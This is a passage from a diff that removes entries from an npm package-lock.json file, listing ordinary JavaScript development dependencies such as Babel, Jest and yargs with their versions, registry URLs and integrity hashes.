4.21.0" - } - }, - "node_modules/v8-to-istanbul": { - "version": "9.1.0", - "resolved": "https://registry.npmjs.org/v8-to-istanbul/-/v8-to-istanbul-9.1.0.tgz", - "integrity": "sha512-6z3GW9x8G1gd+JIIgQQQxXuiJtCXeAjp6RaPEPLv62mH3iPHPxV6W3robxtCzNErRo6ZwTmzWhsbNvjyEBKzKA==", - "dev": true, - "dependencies": { - "@jridgewell/trace-mapping": "^0.3.12", - "@types/istanbul-lib-coverage": "^2.0.1", - "convert-source-map": "^1.6.0" - }, - "engines": { - "node": ">=10.12.0" - } - }, - "node_modules/v8-to-istanbul/node_modules/convert-source-map": { - "version": "1.9.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-1.9.0.tgz", - "integrity": "sha512-ASFBup0Mz1uyiIjANan1jzLQami9z1PoYSZCiiYW2FczPbenXc45FZdBZLzOT+r6+iciuEModtmCti+hjaAk0A==", - "dev": true - }, - "node_modules/walker": { - "version": "1.0.8", - "resolved": "https://registry.npmjs.org/walker/-/walker-1.0.8.tgz", - "integrity": "sha512-ts/8E8l5b7kY0vlWLewOkDXMmPdLcVV4GmOQLyxuSswIJsweeFZtAsMF7k1Nszz+TYBQrlYRmzOnr398y1JemQ==", - "dev": true, - "dependencies": { - "makeerror": "1.0.12" - } - }, - "node_modules/which": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/which/-/which-2.0.2.tgz", - "integrity": "sha512-BLI3Tl1TW3Pvl70l3yq3Y64i+awpwXqsGBYWkkqMtnbXgrMD+yj7rhW0kuEDxzJaYXGjEW5ogapKNMEKNMjibA==", - "dev": true, - "dependencies": { - "isexe": "^2.0.0" - }, - "bin": { - "node-which": "bin/node-which" - }, - "engines": { - "node": ">= 8" - } - }, - "node_modules/wrap-ansi": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz", - "integrity": "sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==", - "dev": true, - "dependencies": { - "ansi-styles": "^4.0.0", - "string-width": "^4.1.0", - "strip-ansi": "^6.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/wrap-ansi?sponsor=1" - } - }, - "node_modules/wrappy": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", - "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==", - "dev": true - }, - "node_modules/write-file-atomic": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/write-file-atomic/-/write-file-atomic-4.0.2.tgz", - "integrity": "sha512-7KxauUdBmSdWnmpaGFg+ppNjKF8uNLry8LyzjauQDOVONfFLNKrKvQOxZ/VuTIcS/gge/YNahf5RIIQWTSarlg==", - "dev": true, - "dependencies": { - "imurmurhash": "^0.1.4", - "signal-exit": "^3.0.7" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || >=16.0.0" - } - }, - "node_modules/y18n": { - "version": "5.0.8", - "resolved": "https://registry.npmjs.org/y18n/-/y18n-5.0.8.tgz", - "integrity": "sha512-0pfFzegeDWJHJIAmTLRP2DwHjdF5s7jo9tuztdQxAhINCdvS+3nGINqPd00AphqJR/0LhANUS6/+7SCb98YOfA==", - "dev": true, - "engines": { - "node": ">=10" - } - }, - "node_modules/yallist": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-3.1.1.tgz", - "integrity": "sha512-a4UGQaWPH59mOXUYnAG2ewncQS4i4F43Tv3JoAM+s2VDAmS9NsK8GpDMLrCHPksFT7h3K6TOoUNn2pb7RoXx4g==", - "dev": true - }, - "node_modules/yargs": { - "version": "17.7.2", - "resolved": "https://registry.npmjs.org/yargs/-/yargs-17.7.2.tgz", - "integrity": "sha512-7dSzzRQ++CKnNI/krKnYRV7JKKPUXMEh61soaHKg9mrWEhzFWhFnxPxGl+69cD1Ou63C13NUPCnmIcrvqCuM6w==", - "dev": true, - "dependencies": { - "cliui": "^8.0.1", - "escalade": "^3.1.1", - "get-caller-file": "^2.0.5", - "require-directory": "^2.1.1", - "string-width": "^4.2.3", - "y18n": "^5.0.5", - "yargs-parser": "^21.1.1" - }, - "engines": { - "node": ">=12" - } - }, - "node_modules/yargs-parser": { - "version": "21.1.1", - "resolved": "https://registry.npmjs.org/yargs-parser/-/yargs-parser-21.1.1.tgz", - "integrity": "sha512-tVpsJW7DdjecAiFpbIB1e3qxIQsE6NoPc5/eTdrbbIC4h0LVsWhnoa3g+m2HclBIujHzsxZ4VJVA+GUuc2/LBw==", - "dev": true, - "engines": { - "node": ">=12" - } - }, - "node_modules/yocto-queue": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/yocto-queue/-/yocto-queue-0.1.0.tgz", - "integrity": "sha512-rVksvsnNCdJ/ohGc6xgPwyN8eheCxsiLM8mxuE/t/mOVqJewPuO1miLpTHQiRgTKCLexL4MeAFVagts7HmNZ2Q==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - } - }, - "dependencies": { - "@ampproject/remapping": { - "version": "2.2.1", - "resolved": "https://registry.npmjs.org/@ampproject/remapping/-/remapping-2.2.1.tgz", - "integrity": "sha512-lFMjJTrFL3j7L9yBxwYfCq2k6qqwHyzuUl/XBnif78PWTJYyL/dfowQHWE3sp6U6ZzqWiiIZnpTMO96zhkjwtg==", - "dev": true, - "requires": { - "@jridgewell/gen-mapping": "^0.3.0", - "@jridgewell/trace-mapping": "^0.3.9" - } - }, - "@babel/code-frame": { - "version": "7.22.13", - "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.22.13.tgz", - "integrity": "sha512-XktuhWlJ5g+3TJXc5upd9Ks1HutSArik6jf2eAjYFyIOf4ej3RN+184cZbzDvbPnuTJIUhPKKJE3cIsYTiAT3w==", - "dev": true, - "requires": { - "@babel/highlight": "^7.22.13", - "chalk": "^2.4.2" - }, - "dependencies": { - "ansi-styles": { - "version": "3.2.1", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-3.2.1.tgz", - "integrity": "sha512-VT0ZI6kZRdTh8YyJw3SMbYm/u+NqfsAxEpWO0Pf9sq8/e94WxxOpPKx9FR1FlyCtOVDNOQ+8ntlqFxiRc+r5qA==", - "dev": true, - "requires": { - "color-convert": "^1.9.0" - } - }, - "chalk": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-2.4.2.tgz", - "integrity": "sha512-Mti+f9lpJNcwF4tWV8/OrTTtF1gZi+f8FqlyAdouralcFWFQWF2+NgCHShjkCb+IFBLq9buZwE1xckQU4peSuQ==", - "dev": true, - "requires": { - "ansi-styles": "^3.2.1", - "escape-string-regexp": "^1.0.5", - "supports-color": "^5.3.0" - } - }, - "color-convert": { - "version": "1.9.3", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-1.9.3.tgz", - "integrity": "sha512-QfAUtd+vFdAtFQcC8CCyYt1fYWxSqAiK2cSD6zDB8N3cpsEBAvRxp9zOGg6G/SHHJYAT88/az/IuDGALsNVbGg==", - "dev": true, - "requires": { - "color-name": "1.1.3" - } - }, - "color-name": { - "version": "1.1.3", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.3.tgz", - "integrity": "sha512-72fSenhMw2HZMTVHeCA9KCmpEIbzWiQsjN+BHcBbS9vr1mtt+vJjPdksIBNUmKAW8TFUDPJK5SUU3QhE9NEXDw==", - "dev": true - }, - "escape-string-regexp": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-1.0.5.tgz", - "integrity": "sha512-vbRorB5FUQWvla16U8R/qgaFIya2qGzwDrNmCZuYKrbdSUMG6I1ZCGQRefkRVhuOkIGVne7BQ35DSfo1qvJqFg==", - "dev": true - }, - "has-flag": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-3.0.0.tgz", - "integrity": "sha512-sKJf1+ceQBr4SMkvQnBDNDtf4TXpVhVGateu0t918bl30FnbE2m4vNLX+VWe/dpjlb+HugGYzW7uQXH98HPEYw==", - "dev": true - }, - "supports-color": { - "version": "5.5.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-5.5.0.tgz", - "integrity": "sha512-QjVjwdXIt408MIiAqCX4oUKsgU2EqAGzs2Ppkm4aQYbjm+ZEWEcW4SfFNTr4uMNZma0ey4f5lgLrkB0aX0QMow==", - "dev": true, - "requires": { - "has-flag": "^3.0.0" - } - } - } - }, - "@babel/compat-data": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/compat-data/-/compat-data-7.22.6.tgz", - "integrity": "sha512-29tfsWTq2Ftu7MXmimyC0C5FDZv5DYxOZkh3XD3+QW4V/BYuv/LyEsjj3c0hqedEaDt6DBfDvexMKU8YevdqFg==", - "dev": true - }, - "@babel/core": { - "version": "7.22.8", - "resolved": "https://registry.npmjs.org/@babel/core/-/core-7.22.8.tgz", - "integrity": "sha512-75+KxFB4CZqYRXjx4NlR4J7yGvKumBuZTmV4NV6v09dVXXkuYVYLT68N6HCzLvfJ+fWCxQsntNzKwwIXL4bHnw==", - "dev": true, - "requires": { - "@ampproject/remapping": "^2.2.0", - "@babel/code-frame": "^7.22.5", - "@babel/generator": "^7.22.7", - "@babel/helper-compilation-targets": "^7.22.6", - "@babel/helper-module-transforms": "^7.22.5", - "@babel/helpers": "^7.22.6", - "@babel/parser": "^7.22.7", - "@babel/template": "^7.22.5", - "@babel/traverse": "^7.22.8", - "@babel/types": "^7.22.5", - "@nicolo-ribaudo/semver-v6": "^6.3.3", - "convert-source-map": "^1.7.0", - "debug": "^4.1.0", - "gensync": "^1.0.0-beta.2", - "json5": "^2.2.2" - }, - "dependencies": { - "convert-source-map": { - "version": "1.9.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-1.9.0.tgz", - "integrity": "sha512-ASFBup0Mz1uyiIjANan1jzLQami9z1PoYSZCiiYW2FczPbenXc45FZdBZLzOT+r6+iciuEModtmCti+hjaAk0A==", - "dev": true - } - } - }, - "@babel/generator": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/generator/-/generator-7.23.0.tgz", - "integrity": "sha512-lN85QRR+5IbYrMWM6Y4pE/noaQtg4pNiqeNGX60eqOfo6gtEj6uw/JagelB8vVztSd7R6M5n1+PQkDbHbBRU4g==", - "dev": true, - "requires": { - "@babel/types": "^7.23.0", - "@jridgewell/gen-mapping": "^0.3.2", - "@jridgewell/trace-mapping": "^0.3.17", - "jsesc": "^2.5.1" - } - }, - "@babel/helper-compilation-targets": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/helper-compilation-targets/-/helper-compilation-targets-7.22.6.tgz", - "integrity": "sha512-534sYEqWD9VfUm3IPn2SLcH4Q3P86XL+QvqdC7ZsFrzyyPF3T4XGiVghF6PTYNdWg6pXuoqXxNQAhbYeEInTzA==", - "dev": true, - "requires": { - "@babel/compat-data": "^7.22.6", - "@babel/helper-validator-option": "^7.22.5", - "@nicolo-ribaudo/semver-v6": "^6.3.3", - "browserslist": "^4.21.9", - "lru-cache": "^5.1.1" - } - }, - "@babel/helper-environment-visitor": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/helper-environment-visitor/-/helper-environment-visitor-7.22.20.tgz", - "integrity": "sha512-zfedSIzFhat/gFhWfHtgWvlec0nqB9YEIVrpuwjruLlXfUSnA8cJB0miHKwqDnQ7d32aKo2xt88/xZptwxbfhA==", - "dev": true - }, - "@babel/helper-function-name": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/helper-function-name/-/helper-function-name-7.23.0.tgz", - "integrity": "sha512-OErEqsrxjZTJciZ4Oo+eoZqeW9UIiOcuYKRJA4ZAgV9myA+pOXhhmpfNCKjEH/auVfEYVFJ6y1Tc4r0eIApqiw==", - "dev": true, - "requires": { - "@babel/template": "^7.22.15", - "@babel/types": "^7.23.0" - } - }, - "@babel/helper-hoist-variables": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-hoist-variables/-/helper-hoist-variables-7.22.5.tgz", - "integrity": "sha512-wGjk9QZVzvknA6yKIUURb8zY3grXCcOZt+/7Wcy8O2uctxhplmUPkOdlgoNhmdVee2c92JXbf1xpMtVNbfoxRw==", - "dev": true, - "requires": { - "@babel/types": "^7.22.5" - } - }, - "@babel/helper-module-imports": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-module-imports/-/helper-module-imports-7.22.5.tgz", - "integrity": "sha512-8Dl6+HD/cKifutF5qGd/8ZJi84QeAKh+CEe1sBzz8UayBBGg1dAIJrdHOcOM5b2MpzWL2yuotJTtGjETq0qjXg==", - "dev": true, - "requires": { - "@babel/types": "^7.22.5" - } - }, - "@babel/helper-module-transforms": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-module-transforms/-/helper-module-transforms-7.22.5.tgz", - "integrity": "sha512-+hGKDt/Ze8GFExiVHno/2dvG5IdstpzCq0y4Qc9OJ25D4q3pKfiIP/4Vp3/JvhDkLKsDK2api3q3fpIgiIF5bw==", - "dev": true, - "requires": { - "@babel/helper-environment-visitor": "^7.22.5", - "@babel/helper-module-imports": "^7.22.5", - "@babel/helper-simple-access": "^7.22.5", - "@babel/helper-split-export-declaration": "^7.22.5", - "@babel/helper-validator-identifier": "^7.22.5", - "@babel/template": "^7.22.5", - "@babel/traverse": "^7.22.5", - "@babel/types": "^7.22.5" - } - }, - "@babel/helper-plugin-utils": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-plugin-utils/-/helper-plugin-utils-7.22.5.tgz", - "integrity": "sha512-uLls06UVKgFG9QD4OeFYLEGteMIAa5kpTPcFL28yuCIIzsf6ZyKZMllKVOCZFhiZ5ptnwX4mtKdWCBE/uT4amg==", - "dev": true - }, - "@babel/helper-simple-access": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-simple-access/-/helper-simple-access-7.22.5.tgz", - "integrity": "sha512-n0H99E/K+Bika3++WNL17POvo4rKWZ7lZEp1Q+fStVbUi8nxPQEBOlTmCOxW/0JsS56SKKQ+ojAe2pHKJHN35w==", - "dev": true, - "requires": { - "@babel/types": "^7.22.5" - } - }, - "@babel/helper-split-export-declaration": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/helper-split-export-declaration/-/helper-split-export-declaration-7.22.6.tgz", - "integrity": "sha512-AsUnxuLhRYsisFiaJwvp1QF+I3KjD5FOxut14q/GzovUe6orHLesW2C7d754kRm53h5gqrz6sFl6sxc4BVtE/g==", - "dev": true, - "requires": { - "@babel/types": "^7.22.5" - } - }, - "@babel/helper-string-parser": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-string-parser/-/helper-string-parser-7.22.5.tgz", - "integrity": "sha512-mM4COjgZox8U+JcXQwPijIZLElkgEpO5rsERVDJTc2qfCDfERyob6k5WegS14SX18IIjv+XD+GrqNumY5JRCDw==", - "dev": true - }, - "@babel/helper-validator-identifier": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-identifier/-/helper-validator-identifier-7.22.20.tgz", - "integrity": "sha512-Y4OZ+ytlatR8AI+8KZfKuL5urKp7qey08ha31L8b3BwewJAoJamTzyvxPR/5D+KkdJCGPq/+8TukHBlY10FX9A==", - "dev": true - }, - "@babel/helper-validator-option": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-option/-/helper-validator-option-7.22.5.tgz", - "integrity": "sha512-R3oB6xlIVKUnxNUxbmgq7pKjxpru24zlimpE8WK47fACIlM0II/Hm1RS8IaOI7NgCr6LNS+jl5l75m20npAziw==", - "dev": true - }, - "@babel/helpers": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/helpers/-/helpers-7.22.6.tgz", - "integrity": "sha512-YjDs6y/fVOYFV8hAf1rxd1QvR9wJe1pDBZ2AREKq/SDayfPzgk0PBnVuTCE5X1acEpMMNOVUqoe+OwiZGJ+OaA==", - "dev": true, - "requires": { - "@babel/template": "^7.22.5", - "@babel/traverse": "^7.22.6", - "@babel/types": "^7.22.5" - } - }, - "@babel/highlight": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/highlight/-/highlight-7.22.20.tgz", - "integrity": "sha512-dkdMCN3py0+ksCgYmGG8jKeGA/8Tk+gJwSYYlFGxG5lmhfKNoAy004YpLxpS1W2J8m/EK2Ew+yOs9pVRwO89mg==", - "dev": true, - "requires": { - "@babel/helper-validator-identifier": "^7.22.20", - "chalk": "^2.4.2", - "js-tokens": "^4.0.0" - }, - "dependencies": { - "ansi-styles": { - "version": "3.2.1", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-3.2.1.tgz", - "integrity": "sha512-VT0ZI6kZRdTh8YyJw3SMbYm/u+NqfsAxEpWO0Pf9sq8/e94WxxOpPKx9FR1FlyCtOVDNOQ+8ntlqFxiRc+r5qA==", - "dev": true, - "requires": { - "color-convert": "^1.9.0" - } - }, - "chalk": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-2.4.2.tgz", - "integrity": "sha512-Mti+f9lpJNcwF4tWV8/OrTTtF1gZi+f8FqlyAdouralcFWFQWF2+NgCHShjkCb+IFBLq9buZwE1xckQU4peSuQ==", - "dev": true, - "requires": { - "ansi-styles": "^3.2.1", - "escape-string-regexp": "^1.0.5", - "supports-color": "^5.3.0" - } - }, - "color-convert": { - "version": "1.9.3", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-1.9.3.tgz", - "integrity": "sha512-QfAUtd+vFdAtFQcC8CCyYt1fYWxSqAiK2cSD6zDB8N3cpsEBAvRxp9zOGg6G/SHHJYAT88/az/IuDGALsNVbGg==", - "dev": true, - "requires": { - "color-name": "1.1.3" - } - }, - "color-name": { - "version": "1.1.3", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.3.tgz", - "integrity": "sha512-72fSenhMw2HZMTVHeCA9KCmpEIbzWiQsjN+BHcBbS9vr1mtt+vJjPdksIBNUmKAW8TFUDPJK5SUU3QhE9NEXDw==", - "dev": true - }, - "escape-string-regexp": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-1.0.5.tgz", - "integrity": "sha512-vbRorB5FUQWvla16U8R/qgaFIya2qGzwDrNmCZuYKrbdSUMG6I1ZCGQRefkRVhuOkIGVne7BQ35DSfo1qvJqFg==", - "dev": true - }, - "has-flag": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-3.0.0.tgz", - "integrity": "sha512-sKJf1+ceQBr4SMkvQnBDNDtf4TXpVhVGateu0t918bl30FnbE2m4vNLX+VWe/dpjlb+HugGYzW7uQXH98HPEYw==", - "dev": true - }, - "supports-color": { - "version": "5.5.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-5.5.0.tgz", - "integrity": "sha512-QjVjwdXIt408MIiAqCX4oUKsgU2EqAGzs2Ppkm4aQYbjm+ZEWEcW4SfFNTr4uMNZma0ey4f5lgLrkB0aX0QMow==", - "dev": true, - "requires": { - "has-flag": "^3.0.0" - } - } - } - }, - "@babel/parser": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/parser/-/parser-7.23.0.tgz", - "integrity": "sha512-vvPKKdMemU85V9WE/l5wZEmImpCtLqbnTvqDS2U1fJ96KrxoW7KrXhNsNCblQlg8Ck4b85yxdTyelsMUgFUXiw==", - "dev": true - }, - "@babel/plugin-syntax-async-generators": { - "version": "7.8.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-async-generators/-/plugin-syntax-async-generators-7.8.4.tgz", - "integrity": "sha512-tycmZxkGfZaxhMRbXlPXuVFpdWlXpir2W4AMhSJgRKzk/eDlIXOhb2LHWoLpDF7TEHylV5zNhykX6KAgHJmTNw==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-bigint": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-bigint/-/plugin-syntax-bigint-7.8.3.tgz", - "integrity": "sha512-wnTnFlG+YxQm3vDxpGE57Pj0srRU4sHE/mDkt1qv2YJJSeUAec2ma4WLUnUPeKjyrfntVwe/N6dCXpU+zL3Npg==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-class-properties": { - "version": "7.12.13", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-class-properties/-/plugin-syntax-class-properties-7.12.13.tgz", - "integrity": "sha512-fm4idjKla0YahUNgFNLCB0qySdsoPiZP3iQE3rky0mBUtMZ23yDJ9SJdg6dXTSDnulOVqiF3Hgr9nbXvXTQZYA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.12.13" - } - }, - "@babel/plugin-syntax-import-meta": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-import-meta/-/plugin-syntax-import-meta-7.10.4.tgz", - "integrity": "sha512-Yqfm+XDx0+Prh3VSeEQCPU81yC+JWZ2pDPFSS4ZdpfZhp4MkFMaDC1UqseovEKwSUpnIL7+vK+Clp7bfh0iD7g==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.10.4" - } - }, - "@babel/plugin-syntax-json-strings": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-json-strings/-/plugin-syntax-json-strings-7.8.3.tgz", - "integrity": "sha512-lY6kdGpWHvjoe2vk4WrAapEuBR69EMxZl+RoGRhrFGNYVK8mOPAW8VfbT/ZgrFbXlDNiiaxQnAtgVCZ6jv30EA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-jsx": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-jsx/-/plugin-syntax-jsx-7.22.5.tgz", - "integrity": "sha512-gvyP4hZrgrs/wWMaocvxZ44Hw0b3W8Pe+cMxc8V1ULQ07oh8VNbIRaoD1LRZVTvD+0nieDKjfgKg89sD7rrKrg==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.22.5" - } - }, - "@babel/plugin-syntax-logical-assignment-operators": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-logical-assignment-operators/-/plugin-syntax-logical-assignment-operators-7.10.4.tgz", - "integrity": "sha512-d8waShlpFDinQ5MtvGU9xDAOzKH47+FFoney2baFIoMr952hKOLp1HR7VszoZvOsV/4+RRszNY7D17ba0te0ig==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.10.4" - } - }, - "@babel/plugin-syntax-nullish-coalescing-operator": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-nullish-coalescing-operator/-/plugin-syntax-nullish-coalescing-operator-7.8.3.tgz", - "integrity": "sha512-aSff4zPII1u2QD7y+F8oDsz19ew4IGEJg9SVW+bqwpwtfFleiQDMdzA/R+UlWDzfnHFCxxleFT0PMIrR36XLNQ==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-numeric-separator": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-numeric-separator/-/plugin-syntax-numeric-separator-7.10.4.tgz", - "integrity": "sha512-9H6YdfkcK/uOnY/K7/aA2xpzaAgkQn37yzWUMRK7OaPOqOpGS1+n0H5hxT9AUw9EsSjPW8SVyMJwYRtWs3X3ug==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.10.4" - } - }, - "@babel/plugin-syntax-object-rest-spread": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-object-rest-spread/-/plugin-syntax-object-rest-spread-7.8.3.tgz", - "integrity": "sha512-XoqMijGZb9y3y2XskN+P1wUGiVwWZ5JmoDRwx5+3GmEplNyVM2s2Dg8ILFQm8rWM48orGy5YpI5Bl8U1y7ydlA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-optional-catch-binding": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-catch-binding/-/plugin-syntax-optional-catch-binding-7.8.3.tgz", - "integrity": "sha512-6VPD0Pc1lpTqw0aKoeRTMiB+kWhAoT24PA+ksWSBrFtl5SIRVpZlwN3NNPQjehA2E/91FV3RjLWoVTglWcSV3Q==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-optional-chaining": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-chaining/-/plugin-syntax-optional-chaining-7.8.3.tgz", - "integrity": "sha512-KoK9ErH1MBlCPxV0VANkXW2/dw4vlbGDrFgz8bmUsBGYkFRcbRwMh6cIJubdPrkxRwuGdtCk0v/wPTKbQgBjkg==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-top-level-await": { - "version": "7.14.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-top-level-await/-/plugin-syntax-top-level-await-7.14.5.tgz", - "integrity": "sha512-hx++upLv5U1rgYfwe1xBQUhRmU41NEvpUvrp8jkrSCdvGSnM5/qdRMtylJ6PG5OFkBaHkbTAKTnd3/YyESRHFw==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.14.5" - } - }, - "@babel/plugin-syntax-typescript": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-typescript/-/plugin-syntax-typescript-7.22.5.tgz", - "integrity": "sha512-1mS2o03i7t1c6VzH6fdQ3OA8tcEIxwG18zIPRp+UY1Ihv6W+XZzBCVxExF9upussPXJ0xE9XRHwMoNs1ep/nRQ==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.22.5" - } - }, - "@babel/template": { - "version": "7.22.15", - "resolved": "https://registry.npmjs.org/@babel/template/-/template-7.22.15.tgz", - "integrity": "sha512-QPErUVm4uyJa60rkI73qneDacvdvzxshT3kksGqlGWYdOTIUOwJ7RDUL8sGqslY1uXWSL6xMFKEXDS3ox2uF0w==", - "dev": true, - "requires": { - "@babel/code-frame": "^7.22.13", - "@babel/parser": "^7.22.15", - "@babel/types": "^7.22.15" - } - }, - "@babel/traverse": { - "version": "7.23.2", - "resolved": "https://registry.npmjs.org/@babel/traverse/-/traverse-7.23.2.tgz", - "integrity": "sha512-azpe59SQ48qG6nu2CzcMLbxUudtN+dOM9kDbUqGq3HXUJRlo7i8fvPoxQUzYgLZ4cMVmuZgm8vvBpNeRhd6XSw==", - "dev": true, - "requires": { - "@babel/code-frame": "^7.22.13", - "@babel/generator": "^7.23.0", - "@babel/helper-environment-visitor": "^7.22.20", - "@babel/helper-function-name": "^7.23.0", - "@babel/helper-hoist-variables": "^7.22.5", - "@babel/helper-split-export-declaration": "^7.22.6", - "@babel/parser": "^7.23.0", - "@babel/types": "^7.23.0", - "debug": "^4.1.0", - "globals": "^11.1.0" - } - }, - "@babel/types": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/types/-/types-7.23.0.tgz", - "integrity": "sha512-0oIyUfKoI3mSqMvsxBdclDwxXKXAUA8v/apZbc+iSyARYou1o8ZGDxbUYyLFoW2arqS2jDGqJuZvv1d/io1axg==", - "dev": true, - "requires": { - "@babel/helper-string-parser": "^7.22.5", - "@babel/helper-validator-identifier": "^7.22.20", - "to-fast-properties": "^2.0.0" - } - }, - "@bcoe/v8-coverage": { - "version": "0.2.3", - "resolved": "https://registry.npmjs.org/@bcoe/v8-coverage/-/v8-coverage-0.2.3.tgz", - "integrity": "sha512-0hYQ8SB4Db5zvZB4axdMHGwEaQjkZzFjQiN9LVYvIFB2nSUHW9tYpxWriPrWDASIxiaXax83REcLxuSdnGPZtw==", - "dev": true - }, - "@istanbuljs/load-nyc-config": { - "version": "1.1.0", - "resolved": "https://registry.npmjs.org/@istanbuljs/load-nyc-config/-/load-nyc-config-1.1.0.tgz", - "integrity": "sha512-VjeHSlIzpv/NyD3N0YuHfXOPDIixcA1q2ZV98wsMqcYlPmv2n3Yb2lYP9XMElnaFVXg5A7YLTeLu6V84uQDjmQ==", - "dev": true, - "requires": { - "camelcase": "^5.3.1", - "find-up": "^4.1.0", - "get-package-type": "^0.1.0", - "js-yaml": "^3.13.1", - "resolve-from": "^5.0.0" - } - }, - "@istanbuljs/schema": { - "version": "0.1.3", - "resolved": "https://registry.npmjs.org/@istanbuljs/schema/-/schema-0.1.3.tgz", - "integrity": "sha512-ZXRY4jNvVgSVQ8DL3LTcakaAtXwTVUxE81hslsyD2AtoXW/wVob10HkOJ1X/pAlcI7D+2YoZKg5do8G/w6RYgA==", - "dev": true - }, - "@jest/console": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/console/-/console-29.6.1.tgz", - "integrity": "sha512-Aj772AYgwTSr5w8qnyoJ0eDYvN6bMsH3ORH1ivMotrInHLKdUz6BDlaEXHdM6kODaBIkNIyQGzsMvRdOv7VG7Q==", - "dev": true, - "requires": { - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - 